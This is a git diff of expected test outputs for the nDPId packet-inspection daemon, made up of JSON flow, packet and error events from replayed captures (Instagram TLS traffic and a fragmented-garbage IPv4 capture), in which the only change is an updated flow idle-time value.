+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-data-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":12,"total-detected-flows":29,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":242,"global_ts_msec":1568796268061} ~~~~~~~~~~~~~~~~~~~~ 
SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3443/3442 diff --git a/test/results/ip_fragmented_garbage.pcap.out b/test/results/ip_fragmented_garbage.pcap.out index 247697b91..bee01a656 100644 --- a/test/results/ip_fragmented_garbage.pcap.out +++ b/test/results/ip_fragmented_garbage.pcap.out 
@@ -1,7 +1,7 @@ 00472{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1534244024697} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244024697,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244024697,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24102,"dst_port":10792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534244024697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4mKigpKComXiUkI0AjJCUpOAAA"} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697} 
00350{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAl4mKigqJl4lJCMmKihLSUo="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244024697} 
@@ -626,8 +626,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkQyKiZERkdISksmXiUkIyM="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244024701} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244024697,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkVUUiVZXlUm"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025001,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244025001,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18730,"dst_port":20304,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001} 
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjxNTkJIR0ZERVcjQCQlXkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":316,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001} 
@@ -1252,8 +1252,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":625,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSg="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025005} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiomXiUkI0Aj"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305} 
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnVoZ2tmZHNia252Yy8udGc="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":629,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305} 
@@ -1878,8 +1878,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":938,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAj9HUj9HUj9zUj83NDgzOTY="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025309} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAikoKiZeJSQj"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609} 
00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCMkJV4mKigqJl4lJCM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":942,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609} 
@@ -2504,8 +2504,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1251,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAktJSkhHRkQyKiZERkdISks="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025612} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjI0VU"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAmxrZGE+TDxNTkJIR0ZERVc="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1255,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912} 
@@ -3130,8 +3130,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1564,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeSEJHVgo0MjE0NjMxOTg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025916} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjIwNTEpKCom"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"} 